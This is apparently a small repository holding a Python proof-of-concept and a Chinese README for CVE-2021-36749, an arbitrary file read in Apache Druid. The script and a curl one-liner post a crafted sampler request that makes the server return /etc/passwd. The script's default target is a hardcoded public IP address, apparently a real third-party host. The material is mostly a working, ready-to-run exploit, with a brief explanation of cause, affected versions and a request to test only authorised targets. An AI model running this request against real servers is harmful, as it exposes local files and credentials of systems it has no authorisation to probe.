/CVE-2021-36749.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests

class Poc(object):


    def verify(self, data):
        url = data['url'].strip('/') + '/druid/indexer/v1/sampler?for=connect'
        headers = data['headers']
        json_data = {"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "firehose": {"type": "http", "uris": ["file:///etc/passwd"]}}, "dataSchema": {"dataSource": "sample", "parser": {"type": "string", "parseSpec": {"format": "regex", "pattern": "(.*)", "columns": ["a"], "dimensionsSpec": {}, "timestampSpec": {"column": "!!!_no_such_column_!!!", "missingValue": "2010-01-01T00:00:00Z"}}}}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
        try:
            response = requests.post(url, headers=headers, json=json_data, timeout=10, verify=False, allow_redirects=False)
            response_text = response.text
            if 'root:x:0' in response_text:
                return {
                    'title': '{} 存在Apache Druid任意文件读取漏洞(CVE-2021-36749)'.format(url),
                    'desc': '{} 存在Apache Druid任意文件读取漏洞, 返回内容为: {}'.format(url, response_text)

                }
        except Exception:
            pass


if __name__ == "__main__":
    p = Poc()
    r = p.verify({
        'url': 'http://212.83.189.211:8888',
        'headers': {}
    })
    print(r)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2021-36749
Apache Druid 任意文件读取

受影响版本:version <= 0.21.1(该问题在 0.22.0 中修复,建议升级)

漏洞原理:Druid 的 HTTP firehose/InputSource 未限制 URI scheme,传入 `file://` URI 即可让采样接口 `/druid/indexer/v1/sampler` 以 Druid 进程的权限读取服务器本地文件并在响应中回显。请仅在获得授权的目标上测试。

使用以下两种方式均可

## 命令行方式

```bash
curl "http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect" -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\"file:///etc/passwd\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\",\"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_such_column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
```

响应中出现 `root:x:0` 即说明目标存在漏洞。

## 图形界面方式

![1](https://i.loli.net/2021/10/14/bj27OYBhLDQSUw4.png)

![2](https://i.loli.net/2021/10/14/rGORHBnSfoesXhA.png)

## 关于 PoC 脚本的说明

- `verify()` 在目标不存在漏洞、网络异常或请求超时时均返回 `None`(异常被 `except Exception: pass` 吞掉),调用方无法区分"不存在漏洞"和"探测失败"。
- 请求使用 `verify=False` 关闭了 TLS 证书校验,并带 `allow_redirects=False`;在对 HTTPS 目标做授权测试之外的场景不应沿用。
- `__main__` 中的目标地址为硬编码示例,请替换为自己获得授权的测试地址。

--------------------------------------------------------------------------------